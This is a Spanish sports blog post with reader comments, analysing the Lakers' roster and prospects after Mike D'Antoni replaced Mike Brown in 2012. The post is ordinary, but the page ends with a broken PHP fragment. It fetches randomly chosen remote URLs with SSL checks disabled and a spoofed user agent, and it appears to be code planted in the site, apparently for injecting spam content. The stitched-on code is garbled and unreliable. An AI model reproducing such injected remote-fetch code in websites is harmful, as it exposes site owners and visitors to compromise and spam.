Los Lakers de D’Antoni

16 de November de 2012 por MagicJohnson32

Es probable que, dado todo el debate mediático que se ha generado a raíz del traspaso entre Bobcats y Hornets que ha enviado a Matt Carroll a New Orleans a cambio de Hakim Warrick, no os hayáis enterado de que los Lakers han cambiado de entrenador. La noticia ha pasado desapercibida, aunque tal vez hayáis leído algo al respecto en este blog o en cualquier página que le dedique la más mínima atención al baloncesto; el caso es que Mike Brown ya no dirige a los Lakers y le ha sustituido en el cargo Mike D’Antoni. Ahora ya lo sabéis.

Resulta comprensible el sentimiento de decepción que ha provocado en muchos aficionados -mayoritariamente de los Lakers pero también en general- que, contra todo pronóstico, no llegase Phil Jackson para una tercera etapa al mando de ese banquillo que estos últimos días, de manera provisional, ha conducido Bernie Bickerstaff. La presencia en escena del carismático Jackson supone siempre no solo la promesa de éxitos deportivos, sino también de declaraciones punzantes y de una manera de dirigir nada convencional, como cuando responde con postura hierática a los parciales en contra de su equipo en situaciones en las que el resto de entrenadores del planeta pedirían un tiempo muerto.

D'Antoni NashSí, yo también voy a echar de menos a Phil Jackson, seguramente más que nadie. Pero ya está. No es para tanto. Ya hemos discutido y especulado sobre el tema lo suficiente. Y más aun cuando lo que está por llegar es tanto o más interesante: Mike D’Antoni, el ideólogo de los maravillosos Suns de mediados de la pasada década, se pone al frente de la plantilla con mayor potencial ofensivo de la liga y se reúne cinco años después con Steve Nash, líder sobre el parquet de aquel equipo que, dicho sea de paso, eliminó dos años seguidos a los Lakers de Phil Jackson. El simple detalle de la reunión D’Antoni-Nash ya debería de bastar por sí solo para tenernos entusiasmados, expectantes, ansiosos ante la perspectiva de disfrutar de nuevo de la pareja entrenador-jugador que revolucionó los preceptos ofensivos de la NBA.

Pero hay muchos más motivos para celebrar la elección de D’Antoni por parte de la franquicia del purple & gold. También hay, por supuesto, razones para la preocupación. La cuestión es que de poco o nada sirve ya  lo que dijimos sobre los Lakers en el análisis previo a la temporada. Veamos las claves que determinarán el éxito o el fracaso de estos nuevos Lakers:

· Nash. Tan obvio como parece. La presencia de Nash en la plantilla (recordemos, con un contrato por tres temporadas) es fundamental para entender tanto el despido de Mike Brown, como el profundamente impopular descarte de Phil Jackson, como la elección de D’Antoni. El base canadiense se lesionó en el tercer partido de la regular season, y hasta entonces había aparecido desubicado, incómodo ante la rigidez táctica de Mike Brown. La llegada de D’Antoni, entrenador bajo cuyo mando floreció como uno de los mejores bases que se recuerdan y con el que se proclamó doble MVP de la NBA, ha de haber supuesto un inmenso alivio para Nash, a quien la llegada de Phil Jackson y su triángulo ofensivo habrían relegado a un rol de tirador. Para alcanzar su máximo potencial, obviamente, los Lakers necesitan a un Nash sano a las riendas, especialmente si se tiene en cuenta la pobreza de las alternativas en la posición de base. D’Antoni se remite al Showtime y asegura que este equipo puede jugar a 110 o 115 puntos, pero la única manera de lograrlo es con muchos minutos de Nash. El técnico no puede ni soñar que Blake, Duhon o Morris conduzcan el ataque a su manera, y ya se especula con posibles traspasos de cara a buscar una mejoría en esta posición. Una alternativa interesante que se vio en el Spurs-Lakers del pasado martes fue una alineación con Bryant de base. Lo que nos lleva al siguiente punto.

kobe d'antoni· Bryant. Hay quien duda de la idoneidad de Kobe Bryant en un sistema que se fundamenta en la circulación rápida, el pick & roll y la búsqueda de la mejor posición de lanzamiento en el menor tiempo posible. Quien dude posiblemente no haya visto cómo ha empezado Bryant la temporada, con un nivel estratosférico y una eficacia ofensiva extraordinaria. Kobe, más que nadie, está sabiendo sacar partido a la sola presencia de Dwight Howard, raramente recurre al uno-contra-el-mundo y está lanzando en mejores posiciones de lo que le veíamos hacer desde los tiempos de O’Neal. Ha reducido drásticamente sus tiros (promedia 17 por partido, seis menos que la temporada pasada) y está, además, insistiendo en los balones interiores a Howard, consciente del impacto que tendrá el pívot cuando recupere su mejor forma. También sabemos del gran respeto mútuo entre Kobe y D’Antoni, cosa que no se podía decir que sucediese con Mike Brown y algo que sin duda ha de acelerar la necesaria fase de adaptación que se abre con el cambio de técnico. Como adelantábamos unas líneas más arriba, es probable que, sin Nash en cancha, D’Antoni asigne a Kobe la tarea de playmaker.

· Howard. ¿Recordáis las barbaridades que fue capaz de hacer Dwight Howard al lado de Jameer Nelson? Imaginadlo junto a Steve Nash y con un técnico que prioriza el pick & roll. DH12 arrastra todavía los efectos de la operación de espalda a la que se sometió a  finales de la temporada pasada, algo que afecta a su movilidad y rapidez sobre la pista. Pero muy mal tienen que ir las cosas para que en un par de meses no veamos a un Howard demoledor, exprimiendo al máximo los beneficios de jugar junto a Nash y con un entrenador como D’Antoni. Menos juego de espaldas al aro (situaciones en las que las defensas pueden cerrarse y forzar el dos contra uno con facilidad) y más acciones en bloqueo y continuación significarán para Howard una reducción de las pérdidas y muchas canastas fáciles en mates y alley-oops. Welcome to Lob City!

kobe nash howard gasol

· Gasol. Existe cierta preocupación por el papel que asumirá Pau Gasol en los sistemas de D’Antoni, y en realidad los precedentes son francamente positivos para el jugador catalán. Primero, no hay que caer en el tópico de que D’Antoni solo juega small-ball, y no tenemos más que recordar que en Phoenix sacó todo el partido posible al doble poste Amaré-O’Neal. En segundo lugar, Gasol tiene las cualidades idóneas para ser una versión mejorada de aquel fantástico Boris Diaw de la temporada 2005-2006, que promedió 13 puntos, 7 rebotes y 6 asistencias. Pau puede anotar más, puede rebotear más y es capaz de pasar tan bien como el francés. En un sistema en el que el pase es primordial, Gasol se va a encontrar especialmente cómodo. Tercero, cualquier cosa será para él mejor que lo que le ofrecía Mike Brown.

· El resto. Metta World Peace y Antawn Jamison son los únicos con minutos garantizados de entre los otros. En un juego más abierto, como el que aplicarán los Lakers de D’Antoni, ambos deberían mejorar de manera casi inmediata los paupérrimos porcentajes de tiro que arrastran (36,5 y 37% respectivamente). En cuanto a Jordan Hill, que viene siendo el mejor jugador de banquillo, sabemos que tuvo problemas con D’Antoni en su temporada rookie en NY, cuando acabó traspasado a los Rockets. Sin embargo, Hill ha mejorado sustancialmente desde entonces, es casi la única rotación interior de garantías en toda la plantilla y su impresionante productividad, especialmente en el rebote ofensivo (es 12º de la liga en este apartado pese a jugar solo 16 minutos por partido), le hacen merecedor de un sitio en la rotación habitual. Meeks es el caso opuesto: su productividad ha tendido a cero y no ha hecho ningún mérito para disponer de más tiempo en pista, pero -aunque sus nefastos porcentajes indiquen lo contrario- es un tirador, y con D’Antoni hacen falta tiradores. Mejor no se le podrían haber puesto las cosas al ex Sixers. Otros, como Blake, Morris, Clark, Ebanks, Sacre o Duhon (que hizo con D’Antoni la que es, de largo, su mejor campaña como profesional), lo van a tener difícil con un técnico que recorta las rotaciones al máximo. Más de uno de ellos quedará sepultado en lo más profundo del banquillo.

d'antoni lak· Las dudas. Son varios los interrogantes que se alzan. Para empezar, los Lakers voltean de manera radical el planteamiento, y deberán pasar de la fijación en la defensa y la nadería ofensiva de Brown a la efervescencia atacante que demanda D’Antoni, todo esto sin un training camp y con una plantilla que no estaba específicamente diseñada para ello. La decisión del cambio de entrenador se debió haber tomado en junio, aunque más vale tarde que nunca. Tal vez la principal duda en este nuevo panorama es cómo aguantarán los más veteranos (Nash, Kobe, Pau) la carga de minutos que implicaría una política de rotaciones como la que D’Antoni ha acostumbrado históricamente a poner en práctica. Tampoco está claro de dónde llegará la anotación exterior, algo fundamental en la propuesta del nuevo técnico e imprescindible para sacar todo el partido a la generación de espacios que provoca Howard. Sin duda, Nash va a encontrar posiciones de tiro ideales para World Peace, Meeks, Jamison y compañía, pero ¿serán estos capaces de aprovecharlas? A la plantilla le falta también velocidad para brillar al contraataque, aunque con Nash a los mandos no se trata tanto de contraatacar como de encontrar tiros cómodos y desarmar las defensas rivales en transición, los famosos ‘Seven Seconds Or Less’.

Esta noche (4h30, precisamente ante los Suns) tendremos un primer anticipo de qué podemos esperar de los Lakers de D’Antoni, aunque seguramente el técnico, recién operado de la rodilla, no podrá estar en el banquillo hasta el domingo, cuando los Houston Rockets visitarán el Staples. Se abrirá así, en definitiva, una nueva e intransitada senda para los Lakers, en la que la presión por ganar y el decepcionante modo en el que se manejó el recambio de entrenador no han de eclipsar unas perspectivas francamente ilusionantes.

Comenta

7 comentarios a esta entrada

  1. Pop dice:
    #1

    Una delicia de artículo, como siempre, Magic. Básicamente estoy de acuerdo con tus apreciaciones. Al final, cuando se ponen los pros y los contras del nuevo modelo sobre la mesa, creo que hay que tener claro que lo importante es la filosofía que condiciona a este entrenador, de forma de entender el juego y de la manera de distribuir roles. No hay que pensar tanto en que va a clonar a los Suns, que Nash tiene un porrón de años o que Pau no corre como Marion; sino en la esencia que se esconde detrás: ataques, transiciones, libertad…

    Después de la pesadilla de Brown, tiene que ser como abrir una ventana de aire fresco!

      Citar

  2. Esteban dice:
    #2

    el problema no es d`antoni, ni brown ni todos los jugadores a los que les has dedicado un parrafo

    el problema son los jugadores que no merecen un parrafo, y asi sera muy dificil

    a ver, corriganme si me equivoco:

    Metta world peace y eubanks, son por lejos la peor dupla de aleros de la nba, NO TIRAN BIEN, NO PENETRAN BIEN, NO PASAN BIEN EL BALOn, y para colmo nisiquiera tienen un mercado, METTA tiene un contrato intranferible y eubanks no ha mostrado nada de nada como para que alguien de algo decente por el

    los bases suplentes son de lo peor, que bien funcionaria sessions como sexot hombre en el lugar de BLAKE, duhon y morris no merecen jugar

    meeks y jamison, son los hombres con mejores pergaminos inmediatos de la banca y han jugado desastrozo

    hill como bien dicen es el unico que se salva, Y COMO SE SALVA, pdeberia ser traspasado para ser centro titular en otro equipo

    en este estado de cosas, y con los contratoa que tienen los lakers, necesitaran un regalo como el de cavs el año pasado o un milagro, con 4 jugadores y 11 mancos, no puedes ganar la liga

    jamison deberia mejorar mucho su nivel y meeks anotar lso triples como debe, y de alguna manera encontrar entre duhon, blake y morris un base que al menos no pierda juegos solo

    de lo contrario, ni el maestro de la paz gana el titulo

      Citar

  3. Alfredo dice:
    #3

    Qué caprichosa es la vida… Debut contra los Suns… Excelente artículo Magic. Si mejoran los Lakers lo que se presupone, y con el bajón que han dado sin Harden los teóricos mejores de la conferencia….

      Citar

  4. Jose Luis dice:
    #4

    Los Spurs ya sufrieron para ganarles, y eso que no estaba Nash… vale que tampoco Ginóbili está a su nivel, y este a su nivel aporta muchísimo… pero los Lakers están sin sistema y con varios jugadores en crisis. Creo que no llegar a final de conferencia, es un fracaso enorme.

      Citar

  5. TheDeerHunter dice:
    #5

    Esteban:
    el problema no es d`antoni, ni brown ni todos los jugadores a los que les has dedicado un parrafo

    el problema son los jugadores que no merecen un parrafo, y asi sera muy dificil

    a ver, corriganme si me equivoco:

    Metta world peace y eubanks, son por lejos la peor dupla de aleros de la nba, NO TIRAN BIEN, NO PENETRAN BIEN, NO PASAN BIEN EL BALOn, y para colmo nisiquiera tienen un mercado, METTA tiene un contrato intranferible y eubanks no ha mostrado nada de nada como para que alguien de algo decente por el

    los bases suplentes son de lo peor, que bien funcionaria sessions como sexot hombre en el lugar de BLAKE, duhon y morris no merecen jugar

    meeks y jamison, son los hombres con mejores pergaminos inmediatos de la banca y han jugado desastrozo

    hill como bien dicen es el unico que se salva, Y COMO SE SALVA, pdeberia ser traspasado para ser centro titular en otro equipo

    en este estado de cosas, y con los contratoa que tienen los lakers, necesitaran un regalo como el de cavs el año pasado o un milagro, con 4 jugadores y 11 mancos, no puedes ganar la liga

    jamison deberia mejorar mucho su nivel y meeks anotar lso triples como debe, y de alguna manera encontrar entre duhon, blake y morris un base que al menos no pierda juegos solo

    de lo contrario, ni el maestro de la paz gana el titulo

    No podría estar más en desacuerdo. Si en un equipo donde coinciden 4 top 25? de la liga le echamos la culpa de las desgracias la tienen Ebanks y sejemantes… es que nos estamos volviendo locos.

    Para empezar, me resulta curioso que se hable de MWP en esos términos. De entrada viene siendo su mejor campaña en L.A. y podría hacer mención a como terminó su 2ª mejor campaña. Estamos hablando de alguien que fue all-star sin “tirar bien, penetrar bien, pasar bien…” y que acumula unos cuantos premios más que los que podrían soñar la mayoría. ¿Señalamos sus carencias y omitimos casualmente sus virtudes? Por mi parte en el estado de forma que se encuentra se le puede reprochar muy poco este año.

    Después… ¿Sessions funcionó bien?? Sus playoffs fueron una absoluta vergüenza. 6 de sus últimos 8 apariciones fueron de juzgado de guardia. Tampoco hablamos del mismo perfil de jugador ni el mismo nivel de exigencia si comparamos con Blake, Morris o Duhon. Me parece un pasote de los gordos que comentes que ellos sólos han perdido algún partido. Para mi los bases suplentes han hecho un trabajo razonablemente digno para lo que se les pide. El problema en esa línea es que falta Nash. Una baja de esa categoría debe hacerse notar. A ver si no.

    Coincido, como no puede ser de otra manera, que decepcionan Jamison y Meeks, pero no tanto para cargarles más cuota de culpa de la que les corresponde. Hill lo está haciendo bien… pero no imagino en qué equipo podría ser el C titular.

    Yo no soy de echarle todas las culpas del mundo a Brown. Lo que verdaderamente les estaba matando a Lakers es el bajo estado de forma de Howard, la ausencia de Nash y el juego en transición, muy relacionado con la baja de Nash y la dirección de Brown. Ha ayudado el pésimo desempeño de la banca, pero en ningún caso podemos decir que ese fuera la principal causa de la situación.

      Citar

  6. GreenPride dice:
    #6

    Fenomenal artículo Magic, aunque un poco optimista desde el punto de vista Laker desde mi punto de vista.
    Estoy de acuerdo en que con Brown no se iba a ningún lado y que un cambio de entrenador era necesario (mejor en Junio que ahora). Una vez que sabemos que D’Antoni es el elegido creo que hay varias interrogantes y varias cosas que están claras:
    1) El ataque laker va a mejorar rápida y drásticamente. El hecho de dar libertad a los jugadores y jugar más rápido y a más posesiones tiene que influir positivamente en unos jugadores de la calidad de los que tienen los Lakers. Aquí el más beneficiado debería ser Nash que con Brown iba a estar al 50% de su capacidad.
    2) Faltan lanzadores fiables para el sistema que normalmente propone D’Antoni: En este sistema suele haber muchos tiros rápidos y muchos triples y salvo Nash o Kobe (que son mucho más que meros tiradores) no parece haber un lanzador de tres en condiciones para aprovechar los espacios. Debería despertar Meeks y que Jamison empezase a meter algunas aunque lo lógico sería buscar un tirador usando a los Sacre, Blake, Duhon y demás gente del banquillo que no van a jugar
    3) ¿Aguantarán las piernas de los veteranos este ritmo y las cortas rotaciones? Si D’Antoni aplica sus máximas los titulares van a jugar mucho y a toda pastilla y como exceptuando a Howard no son precisamente jovencitos habrá que ver si les aguantan las piernas lo que nos lleva al siguiente punto
    4) ¿Defensa? Todos sabemos que la defensa es un punto fundamental si se quiere hacer algo de verdad en esta liga. En la regular se pueden ganar muchos partidos con este ritmo ràpido y de canastas fáciles pero llegados los PO las cosas se ponen más duras y los ataques rápidos empiezan a costar más. Ahí es necesario que la defensa actúe y este siempre ha sido el punto flojo de los equipos de D’Antoni y que les ha impedido alcanzar más éxitos. Veremos si además de correr a atacar a Nash, Kobe o Pau les quedan fuerzas para defender a la hora de la verdad y contra rivales de entidad.
    5) Pau. Para mí la gran incógnita en este sistema. Nash se lo conoce, Kobe es Kobe y se adaptará y Howard es el gran beneficiado pues el juego rápido y de pick&roll le beneficia mucho pero Pau aparece una vez más como la incóginita de estos Lakers. El catalán no parece un jugador capacitado para el alto ritmo de minutos y posesiones que propone este modelo de juego y si bien es un gran pasador debe tener fuelle y llegar a tiempo a ambos lados de la cancha. De su éxito en la adaptación puede depender mucho el éxito.
    6) Banquillo. Ya se sabe que D’Antoni usa poco el banco pero aquí va a tener que hacer malabares. O espabilan Meeks y Jamison o sus super-titulares pueden llegar fundidos al momento de la verdad. Papelón aquí para el bueno de Mike.
    Sin duda va a ser apasionante ver cómo evolucionan estos Lakers. De momento derrota por los pelos contra Spurs en un partido malísimo por parte de ambos y victorias con muchos puntos ante Suns y Rockets. Ahora les vienen partidos contra Nets o Grizzlies pero será demasiado pronto para juzgarles y mejor darles un par de meses a ver cómo se asientan

      Citar

  7. MagicJohnson32 dice:
    #7

    Estoy básicamente de acuerdo con todo lo que dice DeerHunter, punto por punto.

    GreenPride, es cierto, fui deliberadamente optimista porque me parecía que había un cierto tono negativo con respecto a la llegada D’Antoni (en parte lógico por todo lo de Phil Jackson) y quería ante todo dar a entender que los Lakers tienen muchos motivos para la ilusión y para pensar en positivo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>